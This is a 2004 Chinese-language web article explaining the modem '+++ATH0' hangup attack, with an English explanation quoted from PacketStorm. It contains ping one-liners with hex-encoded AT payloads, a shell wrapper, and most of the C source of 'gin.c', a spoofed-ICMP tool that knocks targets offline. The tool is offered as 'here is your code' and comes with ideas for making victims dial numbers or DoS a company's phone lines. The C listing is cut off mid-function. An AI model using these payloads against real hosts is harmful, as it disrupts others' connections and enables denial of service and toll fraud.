-
您的位置:首页 → 网络冲浪 → 网络技术 → 远程控制调制解调器
远程控制调制解调器
时间:2004/10/8 16:47:00来源:本站整理作者:蓝点我要评论(0)
-
经常上IRC和聊天室的朋友,大概都有在聊的兴起时突然吊线的情况吧,也许您想那没关系,再上去嘛,可同样的情况又发生了,这!◎#¥%是为什么呢?排除您调制解调器的原因,那就是有人用一些“炸弹”轰炸你。我也有这样的痛苦经历,所以找了些资料读给大家,比如:“怎样远程管理Modems?怎样远程发送AT 命令?我知道他的IP,如何让他断线?我怎样手动控制调制解调器?我怎样防止ATH攻击者?”
首先说一下,数据包再Internet或LAN上的简单传输过程,假设,您的IP为 xx.xx.xx.xx,您要访问的服
务器的IP是:yy.yy.yy.yy,您可以用一个简单的C程序来发送一些数据到yy.yy.yy.yy:
C Program at Source --------------Router ---------------Daemon at Destination’s Port
(xx.xx.xx.xx) (yy.yy.yy.yy)
上面是一个简单的过程,下面我们描述的再深刻一些:
C Program at source-Modem of Source-Router--Modem of Destination--Destination Daemon
由此可见,数据包通过两个调制解调器,而且不只是信息包通过他们,调制解调器的自身命令也通过。
现在,你知道一个系统与调制解调器通话需要使用调制解调器的命令---AT命令。很难精确的解释AT。
大家都知道“贺氏”吧,是他们首先研发了一种基础的调制解调器的命令,后来很多厂家也遵循这个标准
,所以多数调制解调器为“贺氏兼容”---AT Command set.
————————————————————————————————————————————
要点:一个简单基础的AT命令是让你拨号到你的ISP,你知道,当您按“拨号”按钮时,你的DUN软件对你
的Modem发出这样的命令:
ATDT or ATDP 电话号码
我们分析一下,这个命令,‘AT’激活Modem,第二部分告诉Modem拨号系统的类型,DT为音频,DP为脉冲
方式,最后的部分是你要拨的号码。
说明:要对你的Modem发送命令,你需要使信息包处于命令的状态。
-------------------------------------------------------------------------------------------
Modem只接受在命令的模式下的命令,在默认状态下modem处于命令模式,连入网络后处于在线状态下,这
时,所有的命令将被视为信息包,不被处理。这意味着就算我们知道别人的IP地址,并向他的Modem发送
AT命令,但对方的Modem将把AT命令视为信息包处理,所以我们要让我们的命令起作用,必须改变对方的
IP为命令模式。
当Modem处于在线状态时,我们利用一个溢出漏洞向它发送+++串,将使其被改变为命令模式。这样,当你
知道某人的IP后,向他的Modem发送+++串和AT命令的话,你将可以远程管理这个Modem,使它断线,改
变它的模式,让它向一个特殊号码拨叫等。
下面我们用一个简单的例子说明一下,H0是一个AT命令,它可以使Modem离线或挂起,如下:
+++ATH0
我们将用一个C程序实现这个攻击,在这之前,我先讲一下如何通过ping来实现一个AT命令,但遗憾的是
这个命令在Windows系统下无效,至少从现有的资料来看,效果不大。
ping -c 5 -p 2b2b2b415453323d32353526574f310d ip
如果这个命令你不理解,可以看看*nix box:
$>man ping
下面的脚本也可以实现AT。
#!/bin/sh
ping -p 2b2b2b415448300d $*
说明:ATH0命令并不能在所有的机器上实现,它依赖于Modem的品牌。
——————————————————————————————————————————————
我们从PacketStorm上找到了一个C程序,实现ICMP欺骗攻击。
[ explanation ]
The way the exploit works is it hides escape/control sequences in a ICMP
echo_request packet (it contains the string +++ATH0) the +++ sends the
modem into escape mode (and if the guard time on the modem is set
ridiculously low) it will go into command mode and you can issue it an
ATH0 to hang up. It works on the reply, because it receives the
echo_request packet, then duplicates the packet with a new timestamp and
checksum, dest/source hosts and returns it to the sender, when it returns
it the string is sent to the modem, and thus hanging it up. There are a
few conditions that must be met for it to work (if you dont want to be
vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to
reply to one if it gets one
2) target computer must be using a modem (you can't hangup DS3s, although
i suppose you could hangup telco return connections..if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set
ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't i guess
you can use your own address, but then the target knows where it came
from)
In my experimenting, I have also devised various fun ways to use this
program other than just nuking your buddy off IRC. In theory..it is
possible to modify the program to do fun stuff like make the target call
some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the
modem hangup, pause for 6 seconds then call 5551212..this is fun for
obvious reasons. Then the next variation I came up with is a smurf like
implementation in which you could make a script to DoS a class C subnet,
with the number of your least favorite company, since most company's have
800 numbers, not only does this cause chaos to the phone bank, but also
costs ~$.30 per call...but i don't condone any of those ideas of course,
this is just for experimental/educational purposes only, if you fix your
modems, none of this is possible, so get off your ass and fix it.
script kiddiez: here is your code...
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---
/*
* gin.c
* jpester@engr.csulb.edu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "foo"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
banner();
( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
printf( "cannot resolve source host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
printf( "cannot resolve destination host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, you must be root!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d\n", numpackets );
printf( "Have some gin sucka" );
for( i = 0; i < numpackets; i++ )
gin( sockfd, sin, din );
printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1
)
? 's' : ( char )NULL );
return 0;
}
void usage( char *name )
{
printf( "usage: %s
相关阅读
Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
-
热门文章
小米路由器设置教程附共享有线路由后再接无TP-link无线路由器设置D-Link DI-524M路由器
最新文章
百度网盘解除黑名单摆百度不收录怎么办 百度
10款免费开源图表插件推荐ssid隐藏了怎么办?隐藏SSID的无线网络如何OneDNS设置教程两块网卡访问不同网络案例分享
人气排行
宽带连接图标不见了怎么办 宽带连接图标怎么dell 服务器开机总是提示按F1才能进系统解决dns是什么?dns怎么设置?buffalo无线路由器设置图文教程哪种WIFI无线各种加密方式更安全?ADSL宽带连接错误(720)及解决方法双网卡同时上内外网设置教程公司网络综合布线图解
查看所有0条评论>>